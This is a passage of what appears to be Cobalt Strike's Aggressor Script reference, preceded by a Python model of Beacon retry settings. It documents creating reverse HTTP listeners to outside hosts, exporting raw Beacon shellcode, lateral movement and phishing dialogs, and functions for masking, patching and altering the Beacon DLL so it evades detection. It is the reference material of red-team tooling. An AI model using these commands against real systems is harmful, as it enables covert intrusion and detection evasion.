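# duration suffixes permitted by the documented syntax
_DURATION_SECONDS = {"m": 60, "h": 3600, "d": 86400}
_SPEC = re.compile(r"exit-(\d+)-(\d+)-(\d+)([mhd])")


@dataclass(frozen=True)
class MaxRetry:
    max_attempts: int       # Beacon exits after this many consecutive failed connections
    increase_attempts: int  # after this many failures the sleep time is raised ...
    duration_seconds: int   # ... to this value, unless the current sleep is already longer


def parse_maxretry(spec: str) -> MaxRetry:
    """Parse exit-[max_attempts]-[increase_attempts]-[duration][m,h,d], e.g. exit-10-5-5m."""
    match = _SPEC.fullmatch(spec.strip())
    if not match:
        raise ValueError(f"malformed maxretry value {spec!r}")
    max_attempts, increase_attempts, amount, unit = match.groups()
    return MaxRetry(int(max_attempts), int(increase_attempts), int(amount) * _DURATION_SECONDS[unit])


class RetryModel:
    """Replays the documented retry behaviour for one Beacon (jitter left out)."""

    def __init__(self, policy: MaxRetry, sleep_seconds: int) -> None:
        self.policy = policy
        self.prior_sleep = sleep_seconds  # the value restored on the next successful connection
        self.sleep = sleep_seconds
        self.failures = 0
        self.exited = False

    def on_failure(self) -> bool:
        """Record one failed connection; returns True once Beacon would exit."""
        if self.exited:
            return True
        self.failures += 1
        if self.failures >= self.policy.max_attempts:
            self.exited = True
            return True
        # assumption: the increase applies once the failure count reaches increase_attempts
        if self.failures >= self.policy.increase_attempts and self.sleep < self.policy.duration_seconds:
            self.sleep = self.policy.duration_seconds
        return False

    def on_success(self) -> None:
        """A successful connection resets the failure count and the sleep time."""
        self.failures = 0
        self.sleep = self.prior_sleep


def replay(spec: str, sleep_seconds: int, outcomes: list[str]) -> tuple[int, bool]:
    """Apply a sequence of 'ok' / 'fail' outcomes; returns (final sleep seconds, exited)."""
    model = RetryModel(parse_maxretry(spec), sleep_seconds)
    for outcome in outcomes:
        if outcome == "fail":
            model.on_failure()
        elif outcome == "ok":
            model.on_success()
        else:
            raise ValueError(f"unknown outcome {outcome!r}")
    return model.sleep, model.exited


if __name__ == "__main__":
    # constructed scenario: a 60 second sleep with the example value from the text
    print(replay("exit-10-5-5m", 60, ["fail"] * 5))        # (300, False)
    print(replay("exit-10-5-5m", 60, ["fail"] * 10))       # (300, True)
```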

The proxy configuration string is the same string you would input into Cobalt Strike's listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:pass@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior.

Example

# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
      %(host => "ads.losenolove.com", port => 443));

# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
      %(host => "www.losenolove.com", port => 80, 
      beacons => "www.losenolove.com, www2.losenolove.com"));

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      maxretry => "exit-10-5-5m",
      proxy => "proxy.host"));

listener_delete

Stop and remove a listener.

Arguments

$1 - the listener name

Example

listener_delete("Beacon HTTP");

listener_describe

Describe a listener.

Arguments

$1 - the listener name

$2 - [Optional] the remote target the listener is destined for

Returns

A string describing the listener

Example

foreach $name (listeners()) {
   println("$name is: " . listener_describe($name));
}

listener_info

Get information about a listener.

Arguments

$1 - the listener name

$2 - [Optional] the key to extract a value for

Returns

%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.

$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener's metadata

Example

# create a script console alias to dump listener info
command dump {
   println("Listener $1");
   foreach $key => $value (listener_info($1)) {
      println("$[15]key $value");
   }
}

listener_pivot_create

Create a new pivot listener.

Arguments

$1 - the Beacon ID

$2 - the listener name

$3 - the payload (e.g., windows/beacon_reverse_tcp)

$4 - the listener host

$5 - the listener port

Note

The only valid payload argument is windows/beacon_reverse_tcp.

Example

# create a pivot listener: 
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
   local('$lhost $bid $name $port');
   
   # extract our arguments
   ($bid, $name, $port) = @_;
   
   # get the name of our target
   $lhost = beacon_info($1, "computer");
   
   btask($1, "create TCP listener on $lhost $+ : $+ $port");
   listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

listener_restart

Restart a listener

Arguments

$1 - the listener name

Example

listener_restart("Beacon HTTP");

listeners

Return a list of listener names (with stagers only!) across all team servers this client is connected to.

Returns

An array of listener names.

Example

printAll(listeners());

listeners_local

Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.

Returns

An array of listener names.

Example

printAll(listeners_local());

listeners_stageless

Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they're not actionable via staging or exporting as a Reflective DLL).

Returns

An array of listener names.

Example

printAll(listeners_stageless());

localip

Get the IP address associated with the team server.

Returns

A string with the team server's IP address.

Example

println("I am: " . localip());

menubar

Add a top-level item to the menubar.

Arguments

$1 - the description

$2 - the popup hook

Example

popup mythings {
   item "Keep out" {
   }
}

menubar("My &Things", "mythings");

mynick

Get the nickname associated with the current Cobalt Strike client.

Returns

A string with your nickname.

Example

println("I am: " . mynick());

nextTab

Activate the tab that is to the right of the current tab.

Example

bind Ctrl+Right {
   nextTab();
}

on

Register an event handler. This is an alternative to the on keyword.

Arguments

$1 - the name of the event to respond to

$2 - a callback function. Called when the event happens.

Example

sub foo {
   blog($1, "Foo!");
}

on("beacon_initial", &foo);

openAboutDialog

Open the "About Cobalt Strike" dialog

Example

openAboutDialog();

openApplicationManager

Open the application manager (system profiler results) tab.

Example

openApplicationManager();

openAutoRunDialog

REMOVED Removed in Cobalt Strike 4.0.

openBeaconBrowser

Open the beacon browser tab.

Example

openBeaconBrowser();

openBeaconConsole

Open the console to interact with a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Interact" {
   local('$bid');
   foreach $bid ($1) {
      openBeaconConsole($bid);
   }
}

openBrowserPivotSetup

Open the browser pivot setup dialog.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browser Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openBrowserPivotSetup($bid);
   }
}

openBypassUACDialog

REMOVED Removed in Cobalt Strike 4.1.

openCloneSiteDialog

Open the dialog for the website clone tool.

Example

openCloneSiteDialog();

openConnectDialog

Open the connect dialog.

Example

openConnectDialog();

openCovertVPNSetup

Open the Covert VPN setup dialog.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "VPN Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openCovertVPNSetup($bid);
   }
}

openCredentialManager

Open the credential manager tab.

Example

openCredentialManager();

openDefaultShortcutsDialog

Open the Default Keyboard Shortcuts dialog. This function does not have any parameters.

openDownloadBrowser

Open the download browser tab

Example

openDownloadBrowser();

openElevateDialog

Open the dialog to launch a privilege escalation exploit.

Arguments

$1 - the beacon ID

Example

item "Elevate" {
   local('$bid');
   foreach $bid ($1) {
      openElevateDialog($bid);
   }
}

openEventLog

Open the event log.

Example

openEventLog();

openFileBrowser

Open the file browser for a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browse Files" {
   local('$bid');
   foreach $bid ($1) {
      openFileBrowser($bid);
   }
}

openGoldenTicketDialog

Open a dialog to help generate a golden ticket.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Golden Ticket" {
   local('$bid');
   foreach $bid ($1) {
      openGoldenTicketDialog($bid);
   }
}

openHTMLApplicationDialog

Open the HTML Application Dialog.

Example

openHTMLApplicationDialog();

openHostFileDialog

Open the host file dialog.

Example

openHostFileDialog();

openInterfaceManager

Open the tab to manage Covert VPN interfaces

Example

openInterfaceManager();

openJavaSignedAppletDialog

Open the Java Signed Applet dialog

Example

openJavaSignedAppletDialog();

openJavaSmartAppletDialog

Open the Java Smart Applet dialog

Example

openJavaSmartAppletDialog();

openJumpDialog

Open Cobalt Strike's lateral movement dialog

Arguments

$1 - the type of lateral movement. See &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.

$2 - an array of targets to apply this action against

Example

openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

openKeystrokeBrowser

Open the keystroke browser tab

Example

openKeystrokeBrowser();

openListenerManager

Open the listener manager

Example

openListenerManager();

openMakeTokenDialog

Open a dialog to help generate an access token.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Make Token" {
   local('$bid');
   foreach $bid ($1) {
      openMakeTokenDialog($bid);
   }
}

openMalleableProfileDialog

Open the malleable C2 profile dialog.

Example

openMalleableProfileDialog();

openOfficeMacro

Open the office macro export dialog

Example

openOfficeMacroDialog();

openOneLinerDialog

Open the dialog to generate a PowerShell one-liner for this specific Beacon session.

Arguments

$1 - the beacon ID

Example

item "&One-liner" {
   openOneLinerDialog($1);
}

openOrActivate

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.

Arguments

$1 - the Beacon ID

Example

item "&Activate" {
   local('$bid');
   foreach $bid ($1) {
      openOrActivate($bid);
   }
}

openPayloadGeneratorDialog

Open the Payload Generator dialog.

Example

openPayloadGeneratorDialog();

openPayloadHelper

Open a payload chooser dialog.

Arguments

$1 - a callback function. Arguments: $1 - the selected listener.

Example

openPayloadHelper(lambda({
   bspawn($bid, $1);
}, $bid => $1));

openPivotListenerSetup

Open the pivot listener setup dialog.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Listener..." {
   local('$bid');
   foreach $bid ($1) {
      openPivotListenerSetup($bid);
   }
}

openPortScanner

Open the port scanner dialog

Arguments

$1 - an array of targets to scan

Example

openPortScanner(@("192.168.1.3"));

openPortScannerLocal

Open the port scanner dialog with options to target a Beacon's local network

Arguments

$1 - the beacon to target with this feature

Example

item "Scan" {
   local('$bid');
   foreach $bid ($1) {
      openPortScannerLocal($bid);
   }
}

openPowerShellWebDialog

Open the dialog to setup the PowerShell Web Delivery Attack

Example

openPowerShellWebDialog();

openPreferencesDialog

Open the preferences dialog

Example

openPreferencesDialog();

openProcessBrowser

Open a process browser for one or more Beacons

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Processes" {
   openProcessBrowser($1);
}

openSOCKSBrowser

Open the tab to list SOCKS proxy servers

Example

openSOCKSBrowser();

openSOCKSSetup

Open the SOCKS proxy server setup dialog.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "SOCKS Server" {
   local('$bid');
   foreach $bid ($1) {
      openSOCKSSetup($bid);
   }
}

openScreenshotBrowser

Open the screenshot browser tab

Example

openScreenshotBrowser();

openScriptConsole

Open the Aggressor Script console.

Example

openScriptConsole();

openScriptManager

Open the tab for the script manager.

Example

openScriptManager();

openScriptedWebDialog

Open the dialog to setup a Scripted Web Delivery Attack

Example

openScriptedWebDialog();

openServiceBrowser

Open service browser dialog

Arguments

$1 - an array of targets to show services for

Example

openServiceBrowser(@("192.168.1.3"));

openSiteManager

Open the site manager.

Example

openSiteManager();

openSpawnAsDialog

Open dialog to spawn a payload as another user

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Spawn As..." {
   local('$bid');
   foreach $bid ($1) {
      openSpawnAsDialog($bid);
   }
}

openSpearPhishDialog

Open the dialog for the spear phishing tool.

Example

openSpearPhishDialog();

openSystemInformationDialog

Open the system information dialog.

Example

openSystemInformationDialog();

openSystemProfilerDialog

Open the dialog to setup the system profiler.

Example

openSystemProfilerDialog();

openTargetBrowser

Open the targets browser

Example

openTargetBrowser();

openWebLog

Open the web log tab.

Example

openWebLog();

openWindowsDropperDialog

REMOVED Removed in Cobalt Strike 4.0.

openWindowsExecutableDialog

Open the dialog to generate a Windows executable.

Example

openWindowsExecutableDialog();

openWindowsExecutableStage

Open the dialog to generate a stageless Windows executable.

Example

openWindowsExecutableStage();

openWindowsExecutableStageAllDialog

Open the dialog to generate all of the stageless payloads (in x86 and x64) for all of the configured listeners. This dialog can also be found in the UI menu under Payloads -> Windows Stageless Generate all Payloads.

Example

openWindowsExecutableStageAllDialog();

payload

Exports a raw payload for a specific Cobalt Strike listener.

Arguments

$1 - the listener name

$2 - x86|x64 the architecture of the payload

$3 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$4 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload("my listener", "x86", "process", "Direct");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

payload_bootstrap_hint

Get the offset to function pointer hints used by Beacon's Reflective Loader. Populate these hints with the asked-for process addresses to have Beacon load itself into memory in a more OPSEC-safe way.

Arguments

$1 - the payload position-independent code (specifically, Beacon)

$2 - the function to get the patch location for

Notes

  • Cobalt Strike's Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon's Reflective Loader. The protocol is to patch the location of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32's Export Address Table. This protocol is optional. Artifacts that don't follow this protocol will fallback to resolving key functions via the Export Address Table.
  • The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.

Returns

The offset to a memory location to patch with a pointer for a specific function used by Beacon's Reflective Loader.

payload_local

Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session's metadata.

Arguments

$1 - the parent Beacon session ID

$2 - the listener name

$3 - x86|x64 the architecture of the payload

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload_local($bid, "my listener", "x86", "process", "None");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

pe_insert_rich_header

Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.

Arguments

$1 - Beacon DLL content

$2 - Rich header

Returns

Updated DLL Content

Note

The rich header length should be on a 4 byte boundary for subsequent checksum calculations.

Example

# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);

pe_mask

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Length to mask

$4 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {

   local('$temp_dll, $start, $length, $maskkey');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $start = parseNumber(@loc_en[0], 10);
   $length = 4;
   $maskkey = 22;

   # -------------------------------------
   # mask some data in a dll
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_mask_section

Mask the data of a named section in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Section name

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {

   local('$temp_dll, $section_name, $maskkey');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $section_name = ".text";
   $maskkey = 23;

   # -------------------------------------
   # mask a section in a dll
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   # $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_mask_string

Mask a null-terminated string in the Beacon DLL Content, starting at the specified position. The string bytes and the terminating null are masked.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {

   local('$temp_dll, $location, $length, $maskkey');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $location = @loc[0];
   $length = 5;
   $maskkey = 23;

   # -------------------------------------
   # pe_mask_string (mask a string in a dll)
   # -------------------------------------
   # warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
   $temp_dll = pe_mask_string($temp_dll, $location, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # we are unmasking the length of the string and the null character
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_patch_code

Patch code in the Beacon DLL Content by find/replace within the '.text' section.

Arguments

$1 - Beacon DLL content

$2 - byte array to search for; its position in '.text' resolves the patch offset

$3 - byte array written at the resolved offset (overwrites the existing bytes)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content

# ===========================================================================
sub demo_pe_patch_code {

   local('$temp_dll, $findme, $replacement');

   $temp_dll = $1;

   # ====== simple text values ======
   $findme = "abcABC123";
   $replacement = "123ABCabc";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # ====== byte array written as an escaped byte string ======
   # (find and replacement are identical here, so this call is a no-op
   #  that only shows the form; a real patch differs in the replacement)
   $findme = "\x01\x02\x03\xfc\xfe\xff";
   $replacement = "\x01\x02\x03\xfc\xfe\xff";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_remove_rich_header

Remove the rich header from Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Example

# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);

pe_set_compile_time_with_long

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a long in milliseconds)

Returns

Updated DLL Content

Example

# date is in milliseconds; the PE TimeDateStamp field holds whole seconds
# since the Unix epoch, in UTC. 1893521594000 is 01 Jan 2030 18:13:14 UTC
# (12:13:14 in a UTC-6 local zone)
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

# 1700000001000 is 14 Nov 2023 22:13:21 UTC (16:13:21 in UTC-6)
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

pe_set_compile_time_with_string

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a string)

Returns

Updated DLL Content

Example

# The string is parsed as local time: in the zone used for this example
# (UTC-6), "01 Jan 2020 15:16:17" becomes 1577913377000 ms, which is
# 01 Jan 2020 21:16:17 UTC. Check the stored TimeDateStamp with pedump
# if the exact value matters.
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);

pe_set_export_name

Set the export name in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Export name

Returns

Updated DLL Content

Note

The name must exist in the string table.

Example

# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

pe_set_long

Places a long value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {

   local('$temp_dll, $int_offset, $long_value');
   local('%pemap');
   local('@loc_cs, @val_cs');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   if (size(@val_cs) != 1) {
      warn("Unexpected size of checksum value array: " . size(@val_cs));
   } else {
      warn("Current checksum value: " . @val_cs[0]);
   }

   if (size(@loc_cs) != 1) {
      warn("Unexpected size of checksum location array: " . size(@loc_cs));
   } else {
      warn("Current checksum location: " . @loc_cs[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc_cs[0], 10);
   $long_value = 98765;

   # -------------------------------------
   # pe_set_long (set a long value)
   # -------------------------------------
   # warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
   $temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_short

Places a short value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {

   local('$temp_dll, $int_offset, $short_value');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @(".text.NumberOfRelocations."));
   @val = values(%pemap, @(".text.NumberOfRelocations."));

   if (size(@val) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
   } else {
      warn("Current .text.NumberOfRelocations value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
   } else {
      warn("Current .text.NumberOfRelocations location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc[0], 10);
   $short_value = 128;

   # -------------------------------------
   # pe_set_short (set a short value)
   # -------------------------------------
   # warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
   $temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_string

Places a string value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {

   local('$temp_dll, $location, $value');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc_en[0], 10);
   $value = "BEECON.DLL";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $location . ", " . $value . ")");
   $temp_dll = pe_set_string($temp_dll, $location, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_stringz

Places a string value at a specified location and adds a zero terminator.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - String to set

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {

   local('$temp_dll, $offset, $value');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $offset = parseNumber(@loc[0], 10);
   $value = "abc";

   # -------------------------------------
   # pe_set_stringz
   # -------------------------------------
   # warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
   $temp_dll = pe_set_stringz($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   # $offset = parseNumber(@loc[0], 10);
   # $value = ".tex";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
   # $temp_dll = pe_set_string($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_value_at

Sets a long value based on the location resolved by a name from the PE Map (see pedump).

Arguments

$1 - Beacon DLL content

$2 - Name of location field

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {

   local('$temp_dll, $name, $long_value, $date');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   # %pemap = pedump($temp_dll);
   # @loc = values(%pemap, @("SizeOfImage."));
   # @val = values(%pemap, @("SizeOfImage."));

   # if (size(@val) != 1) {
   #   warn("Unexpected size of SizeOfImage. value array: " . size(@val));
   # } else {
   #   warn("Current SizeOfImage. value: " . @val[0]);
   # }

   # if (size(@loc) != 1) {
   #   warn("Unexpected size of SizeOfImage location array: " . size(@loc));
   # } else {
   #   warn("Current SizeOfImage. location: " . @loc[0]);
   # }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $name = "SizeOfImage";
   $long_value = 22334455;

   # -------------------------------------
   # pe_set_value_at (set a long value at the location resolved by name)
   # -------------------------------------
   # $1 = DLL (byte array)
   # $2 = name (string)
   # $3 = value (long)
   # -------------------------------------
   warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
   $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # set it back?
   # -------------------------------------
   # warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
   # $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_stomp

Set a string to null characters. Starting at the specified location, every byte is set to null until the string's null terminator is reached.

Arguments

$1 - Beacon DLL content

$2 - Start location

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {

   local('$temp_dll, $location');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.1."));
   @val = values(%pemap, @("Sections.AddressOfName.1."));

   if (size(@val) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
   } else {
